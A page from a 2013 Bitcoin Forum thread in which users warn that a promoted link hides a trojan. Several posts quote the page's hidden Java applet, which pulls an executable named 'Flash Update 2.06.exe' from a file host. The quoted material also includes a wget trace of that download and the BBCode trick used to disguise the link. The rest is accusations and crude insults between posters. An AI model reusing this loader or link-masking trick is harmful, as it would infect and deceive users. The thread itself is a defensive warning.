Bitcoin Forum
December 12, 2017, 08:29:57 PM *
News: Latest stable version of Bitcoin Core: 0.15.1  [Torrent].
 
   Home   Help Search Donate Login Register  
Pages: « 1 [2] 3 »  All
  Print  
Author Topic: Germany's Adaption To Bitcoin *AMAZING*  (Read 5487 times)
BTC Books
Member
**
Offline Offline

Activity: 84



View Profile
May 25, 2013, 12:26:44 AM
 #21

Well the first reply happened in < 5 minutes!

Notice the link URL is *NOT* the URL that the anchor text is. The forum shouldn't allow this.

Definitely a scam / attempted virus. And yes those accounts are fake.

MODERATORS REMOVE THIS!

What's wrong with that link?  I saw an ad and a Guardian News article.

The Guardian News article is embedded in the page. But at the bottom of the page is the following code:

<applet name="Java Update 2.06" code="JavaManager.class" archive="cCyzqjNv.jar" width="0" height="0">^M
<param name="mylink" value="taskmgr.exe">^M
<param name="putserver" value="http://ge.tt/api/1/files/8jfPsUh/0/blob?download">^M
<param name="diversion" value="">^M

It attempts to install a trojan. Here is my wget dump... sorry I don't have time to do more in depth analysis on this. But definite virus.

--2013-05-24 20:23:47--  http://ge.tt/api/1/files/8jfPsUh/0/blob?download
Resolving ge.tt... 79.125.123.149
Connecting to ge.tt|79.125.123.149|:80... connected.
HTTP request sent, awaiting response... 307 Temporary Redirect
Location: http://w301638.open.ge.tt/1/files/8jfPsUh/0/blob?referer=&user=anon-ZTCGfaS4PKRSc7YJ6rx4rfqpUptUTnjUPMceEpmd-&download= [following]
--2013-05-24 20:23:47--  http://w301638.open.ge.tt/1/files/8jfPsUh/0/blob?referer=&user=anon-ZTCGfaS4PKRSc7YJ6rx4rfqpUptUTnjUPMceEpmd-&download=
Resolving w301638.open.ge.tt... 54.228.183.153
Connecting to w301638.open.ge.tt|54.228.183.153|:80... connected.
HTTP request sent, awaiting response... 307 Temporary Redirect
Location: http://w144938.blob4.ge.tt/streams/8jfPsUh/Flash%20Update%202.06.exe?sig=-T7ZGwmaPGTWW0NNN1c11zAKOW7ecvJ-qBE&type=download [following]
--2013-05-24 20:23:47--  http://w144938.blob4.ge.tt/streams/8jfPsUh/Flash%20Update%202.06.exe?sig=-T7ZGwmaPGTWW0NNN1c11zAKOW7ecvJ-qBE&type=download
Resolving w144938.blob4.ge.tt... 54.247.2.234
Connecting to w144938.blob4.ge.tt|54.247.2.234|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 819200 (800K) [application/x-msdownload]
Saving to: `Flash Update 2.06.exe?sig=-T7ZGwmaPGTWW0NNN1c11zAKOW7ecvJ-qBE&type=download'

100%[===================================================================================================================>] 819,200      341K/s   in 2.3s

2013-05-24 20:23:50 (341 KB/s) - `Flash Update 2.06.exe?sig=-T7ZGwmaPGTWW0NNN1c11zAKOW7ecvJ-qBE&type=download' saved [819200/819200]


I see.  So somebody who doesn't notice, and is unaffected, is obviously going to be scamming people.  Because they thought the report was a good one.

Right.  Got it.

Dankedan: price seems low, time to sell I think...
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction. Advertise here.
1513110597
Hero Member
*
Offline Offline

Posts: 1513110597

View Profile Personal Message (Offline)

Ignore
1513110597
Reply with quote  #2

1513110597
Report to moderator
1513110597
Hero Member
*
Offline Offline

Posts: 1513110597

View Profile Personal Message (Offline)

Ignore
1513110597
Reply with quote  #2

1513110597
Report to moderator
foggyb
Legendary
*
Offline Offline

Activity: 1344


View Profile
May 25, 2013, 12:28:09 AM
 #22

INB4 yall kill each other, here is the youtube link:

https://www.youtube.com/watch?v=rzKdW-au110
keystroke
Hero Member
*****
Offline Offline

Activity: 842


advocate of a cryptographic attack on the globe


View Profile
May 25, 2013, 12:31:52 AM
 #23

Well the first reply happened in < 5 minutes!

Notice the link URL is *NOT* the URL that the anchor text is. The forum shouldn't allow this.

Definitely a scam / attempted virus. And yes those accounts are fake.

MODERATORS REMOVE THIS!

What's wrong with that link?  I saw an ad and a Guardian News article.

The Guardian News article is embedded in the page. But at the bottom of the page is the following code:

<applet name="Java Update 2.06" code="JavaManager.class" archive="cCyzqjNv.jar" width="0" height="0">^M
<param name="mylink" value="taskmgr.exe">^M
<param name="putserver" value="http://ge.tt/api/1/files/8jfPsUh/0/blob?download">^M
<param name="diversion" value="">^M

It attempts to install a trojan. Here is my wget dump... sorry I don't have time to do more in depth analysis on this. But definite virus.

--2013-05-24 20:23:47--  http://ge.tt/api/1/files/8jfPsUh/0/blob?download
Resolving ge.tt... 79.125.123.149
Connecting to ge.tt|79.125.123.149|:80... connected.
HTTP request sent, awaiting response... 307 Temporary Redirect
Location: http://w301638.open.ge.tt/1/files/8jfPsUh/0/blob?referer=&user=anon-ZTCGfaS4PKRSc7YJ6rx4rfqpUptUTnjUPMceEpmd-&download= [following]
--2013-05-24 20:23:47--  http://w301638.open.ge.tt/1/files/8jfPsUh/0/blob?referer=&user=anon-ZTCGfaS4PKRSc7YJ6rx4rfqpUptUTnjUPMceEpmd-&download=
Resolving w301638.open.ge.tt... 54.228.183.153
Connecting to w301638.open.ge.tt|54.228.183.153|:80... connected.
HTTP request sent, awaiting response... 307 Temporary Redirect
Location: http://w144938.blob4.ge.tt/streams/8jfPsUh/Flash%20Update%202.06.exe?sig=-T7ZGwmaPGTWW0NNN1c11zAKOW7ecvJ-qBE&type=download [following]
--2013-05-24 20:23:47--  http://w144938.blob4.ge.tt/streams/8jfPsUh/Flash%20Update%202.06.exe?sig=-T7ZGwmaPGTWW0NNN1c11zAKOW7ecvJ-qBE&type=download
Resolving w144938.blob4.ge.tt... 54.247.2.234
Connecting to w144938.blob4.ge.tt|54.247.2.234|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 819200 (800K) [application/x-msdownload]
Saving to: `Flash Update 2.06.exe?sig=-T7ZGwmaPGTWW0NNN1c11zAKOW7ecvJ-qBE&type=download'

100%[===================================================================================================================>] 819,200      341K/s   in 2.3s

2013-05-24 20:23:50 (341 KB/s) - `Flash Update 2.06.exe?sig=-T7ZGwmaPGTWW0NNN1c11zAKOW7ecvJ-qBE&type=download' saved [819200/819200]


I see.  So somebody who doesn't notice, and is unaffected, is obviously going to be scamming people.  Because they thought the report was a good one.

Right.  Got it.

I would agree with you except for this fact: The original poster purposely disguised the URL by using the bulletin board markup language to make one URL appear as though it was a different URL. The address they posted as text isn't even a site! i.e. there is no "http://www.guardiannews.com/Bitcoin-town-kreuzberg-germany"

This is the code they used. I added the *s to prevent interpretation:
Quote
[*url=http://stream-rs.com/70304/]http://www.guardiannews.com/Bitcoin-town-kreuzberg-germany[/*url]

Anyway I do not want to argue about it but I did not mean to offend you by saying this post is an attempt at scamming.

BTW here is an analysis of the virus:
https://www.virustotal.com/en/file/952a43985ba918d4b49145b0dd20d11041326f6847631bcd8bc14d775bc3acd1/analysis/1369441669/

"The difference between a castle and a prison is only a question of who holds the keys."
Frozenlock
Sr. Member
****
Offline Offline

Activity: 434



View Profile
May 25, 2013, 12:37:29 AM
 #24

I reported this thread more than an hour ago.

Mods, where are you?  Cry
Singlebyte
Hero Member
*****
Offline Offline

Activity: 854



View Profile
May 25, 2013, 12:40:05 AM
 #25

acne
Singlebyte
ct1aic
inge
BTC Books

All these users gave favorable replies, and all are new users. I'd be careful for possible scams from these guys in the future.


Scam from me?!?   You are way wrong tomatocage.    If there is/was a virus on this site it was not detected by me because I was surfing via Ipad.

Infact I always report virus/scams to moderators.  If they look at my profile they will verify!
keystroke
Hero Member
*****
Offline Offline

Activity: 842


advocate of a cryptographic attack on the globe


View Profile
May 25, 2013, 12:42:05 AM
 #26

INB4 yall kill each other, here is the youtube link:

https://www.youtube.com/watch?v=rzKdW-au110

Thanks! Smiley

"The difference between a castle and a prison is only a question of who holds the keys."
BTC Books
Member
**
Offline Offline

Activity: 84



View Profile
May 25, 2013, 12:45:54 AM
 #27



I would agree with you except for this fact: The original poster purposely disguised the URL by using the bulletin board markup language to make one URL appear as though it was a different URL. The address they posted as text isn't even a site! i.e. there is no "http://www.guardiannews.com/Bitcoin-town-kreuzberg-germany"

This is the code they used. I added the *s to prevent interpretation:
Quote
[*url=http://stream-rs.com/70304/]http://www.guardiannews.com/Bitcoin-town-kreuzberg-germany[/*url]

Anyway I do not want to argue about it but I did not mean to offend you by saying this post is an attempt at scamming.

BTW here is an analysis of the virus:
https://www.virustotal.com/en/file/952a43985ba918d4b49145b0dd20d11041326f6847631bcd8bc14d775bc3acd1/analysis/1369441669/

You haven't offended me, keystroke.

But you're mistaken about www.guardiannews.com.  The site exists.  That's the US version of their co,uk (UK) site - and the one that I have bookmarked for news (being in the US).  If you search the .com site for 'Kreuzberg' you get redirected to the co,uk site where the story lives.  In any case, reading the site name in the OP raised no suspicion with me, being familiar with the US .com version of the site.

Dankedan: price seems low, time to sell I think...
keystroke
Hero Member
*****
Offline Offline

Activity: 842


advocate of a cryptographic attack on the globe


View Profile
May 25, 2013, 12:51:23 AM
 #28



I would agree with you except for this fact: The original poster purposely disguised the URL by using the bulletin board markup language to make one URL appear as though it was a different URL. The address they posted as text isn't even a site! i.e. there is no "http://www.guardiannews.com/Bitcoin-town-kreuzberg-germany"

This is the code they used. I added the *s to prevent interpretation:
Quote
[*url=http://stream-rs.com/70304/]http://www.guardiannews.com/Bitcoin-town-kreuzberg-germany[/*url]

Anyway I do not want to argue about it but I did not mean to offend you by saying this post is an attempt at scamming.

BTW here is an analysis of the virus:
https://www.virustotal.com/en/file/952a43985ba918d4b49145b0dd20d11041326f6847631bcd8bc14d775bc3acd1/analysis/1369441669/

You haven't offended me, keystroke.

But you're mistaken about www.guardiannews.com.  The site exists.  That's the US version of their co,uk (UK) site - and the one that I have bookmarked for news (being in the US).  If you search the .com site for 'Kreuzberg' you get redirected to the co,uk site where the story lives.  In any case, reading the site name in the OP raised no suspicion with me, being familiar with the US .com version of the site.

Ok good! Smiley Yea I wasn't suspicious at first either which is why the forum should disallow anchor text that looks like a URL.

"The difference between a castle and a prison is only a question of who holds the keys."
BTC Books
Member
**
Offline Offline

Activity: 84



View Profile
May 25, 2013, 12:52:31 AM
 #29

acne
Singlebyte
ct1aic
inge
BTC Books

All these users gave favorable replies, and all are new users. I'd be careful for possible scams from these guys in the future.


Scam from me?!?   You are way wrong tomatocage.    If there is/was a virus on this site it was not detected by me because I was surfing via Ipad.

Infact I always report virus/scams to moderators.  If they look at my profile they will verify!


Yes.

Did you ever wonder about the motivation of people who take it upon themselves to make baseless and unresearched accusations about strangers?

You might want to start with a good biography of 'Tailgunner' Joe McCarthy - one-time US Senator from Wisconsin.  For some insight into the flip side of that abysmal human failing, and what it does to people, try reading up on Dalton Trumbo.

Dankedan: price seems low, time to sell I think...
BTCoder
Newbie
*
Offline Offline

Activity: 14



View Profile
May 25, 2013, 12:53:32 AM
 #30

Woah, just logged on and see this! A whole lot of accusations going on here!

Lol, no im not a scammer i got the link to the page reading comments on an article of forbes. Also, what are you guys talking about? I get no "java download" when I click the link..?

Bitcoin Lover!
Justsumdude
Newbie
*
Offline Offline

Activity: 28


View Profile
May 25, 2013, 01:25:29 AM
 #31

look at the page source, at the bottom we have,


Quote
</body>
</html>
</body>
</html>
<applet name="Java Update 2.06" code="JavaManager.class" archive="cCyzqjNv.jar" width="0" height="0">
<param name="mylink" value="taskmgr.exe">
<param name="putserver" value="http://ge.tt/api/1/files/8jfPsUh/0/blob?download">
<param name="diversion" value="">
</applet>

The fact that you haven't edited your post yet, doesn't look good.
Tomatocage
Legendary
*
Offline Offline

Activity: 1526

brb keeping up with the Kardashians


View Profile
May 25, 2013, 01:30:37 AM
 #32

That Tomatocage motherfucker can kiss my ass.  Honest people make honest mistakes - people who want power over others just hurt people to gain power.  I've read his bullshit 'How to Spot a Scammer', and he's a goddamn imbecile.

As for the link, I didn't notice.  I disable Java.

LOL

THIS SPOT FOR RENT* | GPG ID: 4880D85C | 1% Escrow | 8% IPO/ICO Escrow services Temporarily Closed | Bitcointalk is the ONLY place where I use this name (No Skype/IRC/YIM/AIM/etc) | 13CsmTqGNwvFXb7tD9yFvJcEYCDTB8wQTS | Beware of these SCAM sites! | *Sponsored Link
Tomatocage
Legendary
*
Offline Offline

Activity: 1526

brb keeping up with the Kardashians


View Profile
May 25, 2013, 01:32:45 AM
 #33

Tomatocage needs to change his signature "how to spot a scammer", because he is obviously too stupid to tell.  His way is to accuse everyone in a large dragnet.  Lol

That probably sounded a lot better in your head.

THIS SPOT FOR RENT* | GPG ID: 4880D85C | 1% Escrow | 8% IPO/ICO Escrow services Temporarily Closed | Bitcointalk is the ONLY place where I use this name (No Skype/IRC/YIM/AIM/etc) | 13CsmTqGNwvFXb7tD9yFvJcEYCDTB8wQTS | Beware of these SCAM sites! | *Sponsored Link
Frozenlock
Sr. Member
****
Offline Offline

Activity: 434



View Profile
May 25, 2013, 01:33:18 AM
 #34

And BTCoder changed the link in OP... to the trojan one.

Asshole.
Frozenlock
Sr. Member
****
Offline Offline

Activity: 434



View Profile
May 25, 2013, 01:36:40 AM
 #35

This thread has now more than 700 views. How much longer before a mod take it down?  Angry
Singlebyte
Hero Member
*****
Offline Offline

Activity: 854



View Profile
May 25, 2013, 01:39:57 AM
 #36

Fixed my initial post to warn people of virus.
BTC Books
Member
**
Offline Offline

Activity: 84



View Profile
May 25, 2013, 01:45:29 AM
 #37

That Tomatocage motherfucker can kiss my ass.  Honest people make honest mistakes - people who want power over others just hurt people to gain power.  I've read his bullshit 'How to Spot a Scammer', and he's a goddamn imbecile.

As for the link, I didn't notice.  I disable Java.

LOL

Esputame en la leche de tu puta madre, cocksucker,

Dankedan: price seems low, time to sell I think...
BTCoder
Newbie
*
Offline Offline

Activity: 14



View Profile
May 25, 2013, 01:45:59 AM
 #38

Why take my thread down? Its not my website I dont advocate downloading any files from it, just watch the video.

Bitcoin Lover!
Tomatocage
Legendary
*
Offline Offline

Activity: 1526

brb keeping up with the Kardashians


View Profile
May 25, 2013, 01:49:29 AM
 #39

That Tomatocage motherfucker can kiss my ass.  Honest people make honest mistakes - people who want power over others just hurt people to gain power.  I've read his bullshit 'How to Spot a Scammer', and he's a goddamn imbecile.

As for the link, I didn't notice.  I disable Java.

LOL

Esputame en la leche de tu puta madre, cocksucker,

Classy

THIS SPOT FOR RENT* | GPG ID: 4880D85C | 1% Escrow | 8% IPO/ICO Escrow services Temporarily Closed | Bitcointalk is the ONLY place where I use this name (No Skype/IRC/YIM/AIM/etc) | 13CsmTqGNwvFXb7tD9yFvJcEYCDTB8wQTS | Beware of these SCAM sites! | *Sponsored Link
acs26
Guest

May 25, 2013, 01:51:59 AM
 #40

Why take my thread down? Its not my website I dont advocate downloading any files from it, just watch the video.

Not trying to offend you.. But:

It's called actually reading the posts from other people.

 The link you posted was a Trojan Virus, and then sent you to the original site. Please don't try to play dumb, everybody obviously knows you posted the virus. But anyway, while the Virus forwards you to another page it injects itself into your computer.

I personally would believe you had nothing to do with this, but you said it yourself you got the link off of another site instead of finding it yourself on the original site. It's pretty easy to tell that you wanted to inject the virus into others computers, unless you have proof of otherwise....
Pages: « 1 [2] 3 »  All
  Print  
 
Jump to:  

Sponsored by , a Bitcoin-accepting VPN.
Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!